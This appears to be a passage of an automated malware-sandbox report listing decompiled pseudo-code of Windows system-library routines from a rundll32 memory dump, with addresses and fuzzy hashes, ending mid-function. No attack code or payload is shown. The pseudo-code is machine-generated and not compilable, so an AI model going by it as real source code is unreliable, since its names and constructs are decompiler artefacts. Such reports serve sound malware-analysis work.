                                                                                                                0x044091d5
                                                                                                                0x04409239
                                                                                                                0x04409239
                                                                                                                0x044091d7
                                                                                                                0x044091db
                                                                                                                0x044091e1
                                                                                                                0x044091e7
                                                                                                                0x044091fd
                                                                                                                0x04409203
                                                                                                                0x0440921e
                                                                                                                0x04409223
                                                                                                                0x00000000
                                                                                                                0x04409205
                                                                                                                0x04409205
                                                                                                                0x04409208
                                                                                                                0x0440920c
                                                                                                                0x04409214
                                                                                                                0x04409214
                                                                                                                0x0440920c
                                                                                                                0x044091e9
                                                                                                                0x044091e9
                                                                                                                0x044091ee
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091f3
                                                                                                                0x044091e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04409134
                                                                                                                0x04409125
                                                                                                                0x0440911d
                                                                                                                0x0440914e
                                                                                                                0x044090d1
                                                                                                                0x044090d1
                                                                                                                0x044090d3
                                                                                                                0x044090d6
                                                                                                                0x044090d8
                                                                                                                0x00000000
                                                                                                                0x044090d8
                                                                                                                0x044090cf

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 605cdd807ca3fba90593a29ccd5dca33ff8b605c53459479b8c8bd91e1311ccc
                                                                                                                • Instruction ID: a0610887d3c8fd217a49844849f0ce62f46dcd30998ca64a69587acbf711cfe4
                                                                                                                • Opcode Fuzzy Hash: 605cdd807ca3fba90593a29ccd5dca33ff8b605c53459479b8c8bd91e1311ccc
                                                                                                                • Instruction Fuzzy Hash: 6501F4B26012009FEB249F08D840B12B7A9EB41325F25807BE2059B7D3C778FC51CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D4015 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E044D4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04422280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04422280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x44f86ac);
					E0440F900(0x44f86d4, _t28);
					E0441FFB0(0x44f86ac, _t28, 0x44f86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0441FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                                                                                0x044d401a
                                                                                                                0x044d401e
                                                                                                                0x044d4023
                                                                                                                0x044d4028
                                                                                                                0x044d4029
                                                                                                                0x044d402b
                                                                                                                0x044d402f
                                                                                                                0x044d4043
                                                                                                                0x044d4046
                                                                                                                0x044d4051
                                                                                                                0x044d4057
                                                                                                                0x044d405f
                                                                                                                0x044d4062
                                                                                                                0x044d4067
                                                                                                                0x044d406f
                                                                                                                0x044d407c
                                                                                                                0x044d407c
                                                                                                                0x044d408c
                                                                                                                0x044d408c
                                                                                                                0x044d4097

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 427b3a889518acaa2838bf5a2264d278621fc309981741a8a18fe92ea2524cb9
                                                                                                                • Instruction ID: 3fcc7ea9add954e533a9708dbea6064ecb014a9337b340da1664fbf382a4d25e
                                                                                                                • Opcode Fuzzy Hash: 427b3a889518acaa2838bf5a2264d278621fc309981741a8a18fe92ea2524cb9
                                                                                                                • Instruction Fuzzy Hash: 050184722015557FEB11BB6ACE80E13B7ACFB45668B00062BB60887A12CB74FC11C6E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C14FB Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E044C14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x44fd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0444FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04427D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                0x044c14fb
                                                                                                                0x044c14fb
                                                                                                                0x044c150a
                                                                                                                0x044c1514
                                                                                                                0x044c1519
                                                                                                                0x044c151b
                                                                                                                0x044c1526
                                                                                                                0x044c152c
                                                                                                                0x044c1534
                                                                                                                0x044c1537
                                                                                                                0x044c153a
                                                                                                                0x044c1545
                                                                                                                0x044c1557
                                                                                                                0x044c1547
                                                                                                                0x044c1550
                                                                                                                0x044c1550
                                                                                                                0x044c1562
                                                                                                                0x044c1563
                                                                                                                0x044c1565
                                                                                                                0x044c156a
                                                                                                                0x044c157f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1847eb290a37fe914eec08d59b653169fd9078039398c37e4d23d4ca0b921cfb
                                                                                                                • Instruction ID: 531b35f1bd6244f06f751876e04c2bfb4340916e31a00b3dea628cf086eb98e8
                                                                                                                • Opcode Fuzzy Hash: 1847eb290a37fe914eec08d59b653169fd9078039398c37e4d23d4ca0b921cfb
                                                                                                                • Instruction Fuzzy Hash: F6019271A00258AFEF10DF69D841EAEB7B8EF44700F40405BF905EB381DA74EA00CB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044C138A Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 61%
                                                                                                                			E044C138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x44fd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0444FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04427D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0444B640(E04449AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                0x044c138a
                                                                                                                0x044c138a
                                                                                                                0x044c1399
                                                                                                                0x044c13a3
                                                                                                                0x044c13a8
                                                                                                                0x044c13aa
                                                                                                                0x044c13b5
                                                                                                                0x044c13bb
                                                                                                                0x044c13c3
                                                                                                                0x044c13c6
                                                                                                                0x044c13c9
                                                                                                                0x044c13d4
                                                                                                                0x044c13e6
                                                                                                                0x044c13d6
                                                                                                                0x044c13df
                                                                                                                0x044c13df
                                                                                                                0x044c13f1
                                                                                                                0x044c13f2
                                                                                                                0x044c13f4
                                                                                                                0x044c13f9
                                                                                                                0x044c140e

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3dcaaf6c3c843107f118cb07629b538ae5816a05aedaab7396680885e9d7e612
                                                                                                                • Instruction ID: 33d6fb1111cde9b48f280036b982dbaaed203d2864124b8b728ca84fbbc1bcd5
                                                                                                                • Opcode Fuzzy Hash: 3dcaaf6c3c843107f118cb07629b538ae5816a05aedaab7396680885e9d7e612
                                                                                                                • Instruction Fuzzy Hash: 71014071A00258ABEF14DFA9D881EAEB7B8EF44714F44405BB905AB281DA74AA01CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044058EC Relevance: .0, Instructions: 47COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E044058EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x44fd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x43e5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04405943() != 0 &&  *0x44f5320 > 5) {
					E04487B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04487B5E( &_v28, _t28);
					_t11 = E04487B9C(0x44f5320, 0x43ebf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0444B640(_t11, _t17, _v8 ^ _t29, 0x43ebf15, _t27, _t28);
			}















                                                                                                                0x044058fb
                                                                                                                0x044058fe
                                                                                                                0x04405906
                                                                                                                0x0440590a
                                                                                                                0x0440593c
                                                                                                                0x0440593c
                                                                                                                0x0440590c
                                                                                                                0x0440590c
                                                                                                                0x04405911
                                                                                                                0x00000000
                                                                                                                0x04405913
                                                                                                                0x04405913
                                                                                                                0x04405913
                                                                                                                0x04405911
                                                                                                                0x0440591d
                                                                                                                0x04461035
                                                                                                                0x0446103c
                                                                                                                0x0446103f
                                                                                                                0x04461056
                                                                                                                0x04461056
                                                                                                                0x0440593b

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 80570f3a69040764dee9f8b7213a6a3baf9151dd2153bb676dfd5c09b9ab1cf7
                                                                                                                • Instruction ID: 8ca905fec45a2e39c77a05cbf4c5bdb2ef71597916baf914d2c543d4c5099495
                                                                                                                • Opcode Fuzzy Hash: 80570f3a69040764dee9f8b7213a6a3baf9151dd2153bb676dfd5c09b9ab1cf7
                                                                                                                • Instruction Fuzzy Hash: 4201A731B00114BBEF14EA6ADC119BF77A9EF80238F94407F9905A7291EE30FD12CA55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044BFE3F Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E044BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x44fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0444FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E04427D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0444B640(E04449AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                0x044bfe3f
                                                                                                                0x044bfe3f
                                                                                                                0x044bfe4e
                                                                                                                0x044bfe58
                                                                                                                0x044bfe5d
                                                                                                                0x044bfe5f
                                                                                                                0x044bfe6a
                                                                                                                0x044bfe72
                                                                                                                0x044bfe75
                                                                                                                0x044bfe78
                                                                                                                0x044bfe83
                                                                                                                0x044bfe95
                                                                                                                0x044bfe85
                                                                                                                0x044bfe8e
                                                                                                                0x044bfe8e
                                                                                                                0x044bfea0
                                                                                                                0x044bfea1
                                                                                                                0x044bfea3
                                                                                                                0x044bfea8
                                                                                                                0x044bfebd

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4d653872944dfb64f4152e8513be1eb4bacc3ed3e441a872c229242e9943005b
                                                                                                                • Instruction ID: e396885505616f0d4caf25945fbb3f5716a1c3c5df4b67d2c85d13a98899325f
                                                                                                                • Opcode Fuzzy Hash: 4d653872944dfb64f4152e8513be1eb4bacc3ed3e441a872c229242e9943005b
                                                                                                                • Instruction Fuzzy Hash: EA017171E00258ABEF14DBA9D845FAEB7B8EF84704F00406BB904EB281DA74A901C7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044BFEC0 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 59%
                                                                                                                			E044BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x44fd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0444FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04427D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0444B640(E04449AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                                                0x044bfec0
                                                                                                                0x044bfec0
                                                                                                                0x044bfecf
                                                                                                                0x044bfed9
                                                                                                                0x044bfede
                                                                                                                0x044bfee0
                                                                                                                0x044bfeeb
                                                                                                                0x044bfef3
                                                                                                                0x044bfef6
                                                                                                                0x044bfef9
                                                                                                                0x044bff04
                                                                                                                0x044bff16
                                                                                                                0x044bff06
                                                                                                                0x044bff0f
                                                                                                                0x044bff0f
                                                                                                                0x044bff21
                                                                                                                0x044bff22
                                                                                                                0x044bff24
                                                                                                                0x044bff29
                                                                                                                0x044bff3e

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 89f8df82428b063d8de9ec0052588740eb95985b73ed5b5a6c8210e5d558d50f
                                                                                                                • Instruction ID: e03e70330a83b7d7b97b8144fd173d8acda7cf49db78dc395db7ec7c4c607d37
                                                                                                                • Opcode Fuzzy Hash: 89f8df82428b063d8de9ec0052588740eb95985b73ed5b5a6c8210e5d558d50f
                                                                                                                • Instruction Fuzzy Hash: A7018871E00258ABEF14DBA9D845FAFB7B8EF44704F40406BB905EB381D974EA11C795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D1074 Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044D1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E044D165E(__ebx, 0x44f8ae4, (__edx -  *0x44f8b04 >> 0x14) + (__edx -  *0x44f8b04 >> 0x14), __edi, __ecx, (__edx -  *0x44f8b04 >> 0x14) + (__edx -  *0x44f8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E044CAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E04427D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E044BFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                                                                                0x044d1074
                                                                                                                0x044d1080
                                                                                                                0x044d1082
                                                                                                                0x044d108a
                                                                                                                0x044d108f
                                                                                                                0x044d1093
                                                                                                                0x044d10ab
                                                                                                                0x044d10ab
                                                                                                                0x044d10c3
                                                                                                                0x044d10cf
                                                                                                                0x044d10e1
                                                                                                                0x044d10d1
                                                                                                                0x044d10da
                                                                                                                0x044d10da
                                                                                                                0x044d10e9
                                                                                                                0x044d10f5
                                                                                                                0x044d10f5
                                                                                                                0x044d10fe

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5bc844c84e238c121d05ce5ff9421c667dc0fb44f903de9e4849554c0590b1f
                                                                                                                • Instruction ID: 5b6ae4f76855211f2931d118d22b12b9ccadd8321b5b2145f25afdff56acd6e0
                                                                                                                • Opcode Fuzzy Hash: b5bc844c84e238c121d05ce5ff9421c667dc0fb44f903de9e4849554c0590b1f
                                                                                                                • Instruction Fuzzy Hash: 3A01F1726047419BEB12EB69C944B1A77E5AB84314F04862BF88697691EE34E840CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0441B02A Relevance: .0, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0441B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04427D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04487016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                0x0441b037
                                                                                                                0x0441b039
                                                                                                                0x0441b03b
                                                                                                                0x0441b040
                                                                                                                0x0446a60e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446a61d
                                                                                                                0x0441b04b
                                                                                                                0x0441b04e
                                                                                                                0x0446a627
                                                                                                                0x0446a634
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446a641
                                                                                                                0x0446a653
                                                                                                                0x0446a643
                                                                                                                0x0446a64c
                                                                                                                0x0446a64c
                                                                                                                0x0446a65b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446a66c
                                                                                                                0x0441b057
                                                                                                                0x0441b057
                                                                                                                0x0441b057
                                                                                                                0x0441b046
                                                                                                                0x0441b046
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                • Instruction ID: 9885903864705369e1a5066455eb2e4e2d201a63147fe14d708e5adc518c73e8
                                                                                                                • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                • Instruction Fuzzy Hash: 960171313009C09FDB22CB5DC944F677BD8EB46754F0940A6F915DB762D628FC41C621
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8ED6 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E044D8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x44fd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E04427D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0444B640(E04449AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                                                0x044d8ed6
                                                                                                                0x044d8ee5
                                                                                                                0x044d8eed
                                                                                                                0x044d8ef0
                                                                                                                0x044d8efa
                                                                                                                0x044d8f03
                                                                                                                0x044d8f0c
                                                                                                                0x044d8f15
                                                                                                                0x044d8f24
                                                                                                                0x044d8f27
                                                                                                                0x044d8f31
                                                                                                                0x044d8f43
                                                                                                                0x044d8f33
                                                                                                                0x044d8f3c
                                                                                                                0x044d8f3c
                                                                                                                0x044d8f4e
                                                                                                                0x044d8f4f
                                                                                                                0x044d8f51
                                                                                                                0x044d8f56
                                                                                                                0x044d8f69

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2dd9b660dbccb99e78efb487e406c46778d76b4130dc6cd4e96cdbb72e8b986a
                                                                                                                • Instruction ID: 71388940ed59b1c47aaa4bcff6d9dbfa0326862ac90c078dfcbaa6059f95d73b
                                                                                                                • Opcode Fuzzy Hash: 2dd9b660dbccb99e78efb487e406c46778d76b4130dc6cd4e96cdbb72e8b986a
                                                                                                                • Instruction Fuzzy Hash: B7111E70E002599FEB04DFA9D541BAEB7F4FF08300F0442AAE519EB782E634A940CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044D8A62 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 54%
                                                                                                                			E044D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
